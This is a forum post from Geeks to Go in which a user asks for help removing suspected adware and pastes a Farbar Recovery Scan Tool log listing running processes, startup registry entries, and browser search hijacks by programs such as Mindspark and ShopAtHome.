Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

my computer is infected. [Closed]

Scan result of Farbar Recover

  • This topic is locked This topic is locked

#1
cmspears

cmspears

    New Member

  • Member
  • Pip
  • 4 posts

Hi, I just recently came across, "one system care". I didn't recognize it and it didn't look right. I can't attribute any problems to it but when I started to check it out I saw it was a type of malware I shouldn't try and remove myself, and recommended geeks to go for help in removing it. I would appreciate any help i can get. Thank you in advance.

 

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:09-01-2015
Ran by Charlie (administrator) on CHARLIE-SILVER (10-01-2016 12:43:19)
Running from C:\Users\Charlie\Downloads
Loaded Profiles: Charlie (Available Profiles: Charlie)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65barsvc.exe
(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTHelperService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Validity Sensors, Inc.) C:\Windows\System32\valWBFPolicyService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(McAfee, Inc.) C:\Program Files\mcafee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
(Qualcomm®Atheros®) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe
(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe
(ShopAtHome.com) C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
(ShopAtHome.com) C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe
(Dropbox, Inc.) C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\onenotem.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\BtTray.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicator.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\APPINTEGRATOR.EXE
(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator64.exe
(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
(Apple Inc.) C:\Program Files (x86)\QuickTime\QTTask.exe
(SMART Technologies ULC) C:\Program Files (x86)\SMART Technologies\Education Software\FloatingTools.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTNotification.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTTrayIcon.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTBoardService.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTInk.exe
(Joyent, Inc) C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\SBWDKService.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\Office\SMARTInk-SBSDKProxy.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTInkPrivilegedAccess.exe
(Logitech, Inc.) C:\Users\Charlie\AppData\Local\Logitech® Webcam Software\Logishrd\LU2.0\LULnchr.exe
(Logitech, Inc.) C:\Users\Charlie\AppData\Local\Logitech® Webcam Software\Logishrd\LU2.0\LogitechUpdate.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe
(McAfee, Inc.) C:\Program Files\mcafee\MAT\McPvTray.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\CommonBuild\McCBEntAndInstru.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Lavasoft Limited) C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
() C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe
(Lavasoft) C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe
() C:\Program Files (x86)\Get-a-Clip\MFLService2.exe
() C:\Program Files (x86)\Get-a-Clip\mflstart.exe
(The Chromium Authors) C:\Program Files\FusionBrowser\1.265.1\chrome.exe
(The Chromium Authors) C:\Program Files\FusionBrowser\1.265.1\chrome.exe
(The Chromium Authors) C:\Program Files\FusionBrowser\1.265.1\chrome.exe
() C:\Program Files\WebUpdater\1.0.24.0\WebUpdater.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\McChHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7573208 2014-04-22] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2818800 2014-06-16] (Synaptics Incorporated)
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-04-10] (Intel Corporation)
HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-04-01] (Hewlett-Packard Company)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581432 2014-06-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41360 2015-09-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840592 2015-09-24] (Adobe Systems Inc.)
HKLM-x32\...\Run: [FromDocToPDF EPM Support] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65medint.exe [12872 2015-02-11] (Mindspark)
HKLM-x32\...\Run: [FromDocToPDF AppIntegrator 32-bit] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator.exe [225864 2015-02-11] (Mindspark)
HKLM-x32\...\Run: [FromDocToPDF AppIntegrator 64-bit] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator64.exe [258632 2015-02-11] (Mindspark)
HKLM-x32\...\Run: [FromDocToPDF Search Scope Monitor] => "C:\PROGRA~2\FROMDO~2\bar\1.bin\65srchmn.exe" /m=2 /w /h
HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [205336 2011-11-11] (Logitech Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [SMART Floating Tools] => C:\Program Files (x86)\SMART Technologies\Education Software\FloatingTools.exe [9024304 2013-11-20] (SMART Technologies ULC)
HKLM-x32\...\Run: [SMARTNotification] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTNotification.exe [204592 2014-02-12] (SMART Technologies)
HKLM-x32\...\Run: [SMART Tray Tools] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTTrayIcon.exe [744752 2014-02-12] (SMART Technologies)
HKLM-x32\...\Run: [SMART Board Service] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTBoardService.exe [1933616 2014-02-12] (SMART Technologies)
HKLM-x32\...\Run: [sbsdk-server] => C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\NodeLauncher.exe [62768 2013-08-22] (SMART Technologies)
HKLM-x32\...\Run: [SMART Ink] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTInk.exe [147248 2014-02-11] (SMART Technologies)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
HKLM-x32\...\Run: [mflstart] => C:\Program Files (x86)\Get-a-Clip\mflstart.exe [116208 2016-01-10] ()
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [132736 2013-11-29] (Qualcomm®Atheros®)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [HP Officejet Pro 8600 (NET)] => C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [GoogleChromeAutoLaunch_A705C234CC82E085351B039A63375E0A] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [741704 2015-12-10] (Google Inc.)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\AdobeCollabSync.exe [1104288 2015-09-24] (Adobe Systems Incorporated)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2015-01-28] (Garmin Ltd or its subsidiaries)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [Dropbox Update] => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-30] (Dropbox, Inc.)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [ShopAtHomeWatcher] => C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe [130232 2015-07-29] (ShopAtHome.com)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [ShopAtHomeUpdater] => C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe [199864 2015-07-29] (ShopAtHome.com)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe [1445648 2016-01-10] (Lavasoft)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [FusionBrowser] => C:\Program Files\FusionBrowser\1.265.1\chrome.exe [622848 2015-12-02] (The Chromium Authors)
AppInit_DLLs-x32: mfllib.dll => No File
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)
Startup: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2015-12-11]
ShortcutTarget: Dropbox.lnk -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2014-12-23]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\onenotem.exe (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog9 01 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 02 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 03 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 04 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 16 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 01 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 02 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 03 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 04 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 16 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\..\Interfaces\{3A7624B7-0B52-4931-9EE9-C9C86582159C}: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\..\Interfaces\{9381EA84-12A1-427D-AC6D-5FDEA744A58D}: [DhcpNameServer] 40.20.1.201 40.20.1.202
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/?pc=COSP&ptag=D011016-A880FF2AB0987464788F&form=CONMHP&conlogo=CT3332041
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1
URLSearchHook: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 - (No Name) - {4c60e5ab-5c68-4c59-abaa-885010b24b32} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll (Mindspark)
SearchScopes: HKLM -> {59AB8580-D8C1-4DDA-A77F-0B6CA73510AF} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {59AB8580-D8C1-4DDA-A77F-0B6CA73510AF} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CPTqgNak28MCFYNDaQodFm0ArQ&ptb=C7B3E8DB-D9F3-4E0E-ACA1-5E7ACDA2DFF2&ind=2015021120&n=781ac840&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D011016-A880FF2AB0987464788F&form=CONBDF&conlogo=CT3332041&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D011016-A880FF2AB0987464788F&form=CONBDF&conlogo=CT3332041&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {219102B8-E04D-4B03-8893-C16BC58F8C2A} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C011US0D20151117&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {59AB8580-D8C1-4DDA-A77F-0B6CA73510AF} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CPTqgNak28MCFYNDaQodFm0ArQ&ptb=C7B3E8DB-D9F3-4E0E-ACA1-5E7ACDA2DFF2&ind=2015021120&n=781ac840&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {AC00135D-B960-42EF-871F-3C8F42450A63} URL = hxxp://isearch.shopathome.com?user_id={a862d772-5a24-42bb-8804-35868a911247}&q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-12-18] (Microsoft Corporation)
BHO: Advertising Cookie Opt-out -> {8E425EB4-ADBD-4816-B1E8-49BB9DECF034} -> C:\Program Files\Google\Advertising Cookie Opt-out\opt_out.dll [2013-01-10] (Google Inc)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2015-12-18] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
BHO-x32: Adobe PDF Reader Link Helper -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2015-12-18] (Microsoft Corporation)
BHO-x32: SMART Notebook Download Utility -> {67BCF957-85FC-4036-8DC4-D4D80E00A77B} -> C:\Program Files (x86)\SMART Technologies\Education Software\NotebookPlugin.dll [2013-11-27] (SMART Technologies ULC.)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2016-01-01] (Oracle Corporation)
BHO-x32: Advertising Cookie Opt-out -> {8E425EB4-ADBD-4816-B1E8-49BB9DECF034} -> C:\Program Files (x86)\Google\Advertising Cookie Opt-out\opt_out.dll [2013-01-10] (Google Inc)
BHO-x32: Toolbar BHO -> {a235e1e3-6296-4710-af39-104a7faa6c7c} -> C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll [2015-02-11] (Mindspark)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
BHO-x32: MFLHelper Class -> {B0932222-51E2-47D1-A4EF-CB10AE7DF086} -> C:\Program Files (x86)\Get-a-Clip\MFLPluginIE.dll [2016-01-10] (Get-a-Clip)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2015-12-18] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)
